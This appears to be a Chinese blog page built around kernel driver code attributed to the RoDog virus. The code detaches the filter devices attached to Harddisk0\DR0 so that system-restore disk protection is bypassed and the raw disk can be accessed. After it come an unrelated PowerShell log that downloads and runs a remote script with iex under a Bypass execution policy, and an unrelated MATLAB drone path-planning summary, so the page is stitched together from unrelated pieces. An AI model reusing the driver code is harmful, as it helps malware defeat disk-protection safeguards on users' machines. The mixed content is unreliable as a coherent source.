Bypass RestoreSystem

本文分析了RoDog病毒中用于绕过硬盘设备保护的代码片段。通过定义特定的设备名称并利用Windows内核API,该病毒可以暂时断开硬盘设备与上层设备的连接,从而实现对底层硬盘的直接访问。
 来自 rodog病毒
//感谢QQ上某某兄弟的放出来的rodog病毒无壳无下载者版本~
#define PCIHDD_DR0DEVICE_NAME L"//Device//Harddisk0//DR0"
PDEVICE_OBJECT HddDr0Device = NULL;
PDEVICE_OBJECT HddAttDevice = NULL;

void BypassDisk()
     {
     UNICODE_STRING objectName;
     PDEVICE_OBJECT hardObject = NULL;
     PFILE_OBJECT fileObject = NULL;
     NTSTATUS status;
     RtlInitUnicodeString(&objectName, PCIHDD_DR0DEVICE_NAME);
     status = IoGetDeviceObjectPointer(&objectName, FILE_READ_ATTRIBUTES, &fileObject, &hardObject);
     ASSERT(NT_SUCCESS(status));
     HddDr0Device = fileObject->DeviceObject; // 说明 : HddDr0Device->AttachedDevice 就是 hardObject
     if(HddDr0Device->AttachedDevice)
          { // 保存DR0上的附加设备, 然后断开附加, 等EndBypass时恢复附加
          HddAttDevice = InterlockedExchangePointer((PVOID*)&HddDr0Device->AttachedDevice, NULL);
          }
     ObDereferenceObject(fileObject);
     }

void EndBypass()
     {
          if(HddDr0Device && HddAttDevice)
          { // 恢复DR0上的附加设备
          HddDr0Device->AttachedDevice = HddAttDevice;
          }
     }
PS C:\Windows\system32> iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1')) Exception calling "DownloadString" with "1" argument(s): "The underlying connection was closed: An unexpected error occ urred on a send." At line:1 char:1 + iex ((New-Object System.Net.WebClient).DownloadString('https://commun ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : WebException PS C:\Windows\system32> # 临时允许脚本执行(仅限当前进程) PS C:\Windows\system32> Set-ExecutionPolicy Bypass -Scope Process -Force PS C:\Windows\system32> [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1')) WARNING: Files from a previous installation of Chocolatey were found at 'C:\ProgramData\chocolatey'. WARNING: An existing Chocolatey installation was detected. Installation will not continue. This script will not overwrite existing installations. If there is no Chocolatey installation at '', delete the folder and attempt the installation again. Please use choco upgrade chocolatey to handle upgrades of Chocolatey itself. If the existing installation is not functional or a prior installation did not complete, follow these steps: - Backup the files at the path listed above so you can restore your previous installation if needed. - Remove the existing installation manually. - Rerun this installation script. - Reinstall any packages previously installed, if needed (refer to the lib folder in the backup). Once installation is completed, the backup folder is no longer needed and can be deleted. PS C:\Windows\system32> # 检查服务器支持的协议 PS C:\Windows\system32> $url = "https://community.chocolatey.org" PS C:\Windows\system32> [System.Net.ServicePointManager]::FindServicePoint($url).Address AbsolutePath : / AbsoluteUri : https://community.chocolatey.org/ LocalPath : / Authority : community.chocolatey.org HostNameType : Dns IsDefaultPort : True IsFile : False IsLoopback : False PathAndQuery : / Segments : {/} IsUnc : False Host : community.chocolatey.org Port : 443 Query : Fragment : Scheme : https OriginalString : https://community.chocolatey.org DnsSafeHost : community.chocolatey.org IdnHost : community.chocolatey.org IsAbsoluteUri : True UserEscaped : False UserInfo : PS C:\Windows\system32> # 检查系统代理设置 PS C:\Windows\system32> [System.Net.WebRequest]::GetSystemWebProxy().GetProxy($url) AbsolutePath : / AbsoluteUri : https://community.chocolatey.org/ LocalPath : / Authority : community.chocolatey.org HostNameType : Dns IsDefaultPort : True IsFile : False IsLoopback : False PathAndQuery : / Segments : {/} IsUnc : False Host : community.chocolatey.org Port : 443 Query : Fragment : Scheme : https OriginalString : https://community.chocolatey.org DnsSafeHost : community.chocolatey.org IdnHost : community.chocolatey.org IsAbsoluteUri : True UserEscaped : False UserInfo :
09-22
【无人机】基于改进粒子群算法的无人机路径规划研究[和遗传算法、粒子群算法进行比较](Matlab代码实现)内容概要:本文围绕基于改进粒子群算法的无人机路径规划展开研究,重点探讨了在复杂环境中利用改进粒子群算法(PSO)实现无人机三维路径规划的方法,并将其与遗传算法(GA)、标准粒子群算法等传统优化算法进行对比分析。研究内容涵盖路径规划的多目标优化、避障策略、航路点约束以及算法收敛性和寻优能力的评估,所有实验均通过Matlab代码实现,提供了完整的仿真验证流程。文章还提到了多种智能优化算法在无人机路径规划中的应用比较,突出了改进PSO在收敛速度和全局寻优方面的优势。; 适合人群:具备一定Matlab编程基础和优化算法知识的研究生、科研人员及从事无人机路径规划、智能优化算法研究的相关技术人员。; 使用场景及目标:①用于无人机在复杂地形或动态环境下的三维路径规划仿真研究;②比较不同智能优化算法(如PSO、GA、蚁群算法、RRT等)在路径规划中的性能差异;③为多目标优化问题提供算法选型和改进思路。; 阅读建议:建议读者结合文中提供的Matlab代码进行实践操作,重点关注算法的参数设置、适应度函数设计及路径约束处理方式,同时可参考文中提到的多种算法对比思路,拓展到其他智能优化算法的研究与改进中。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值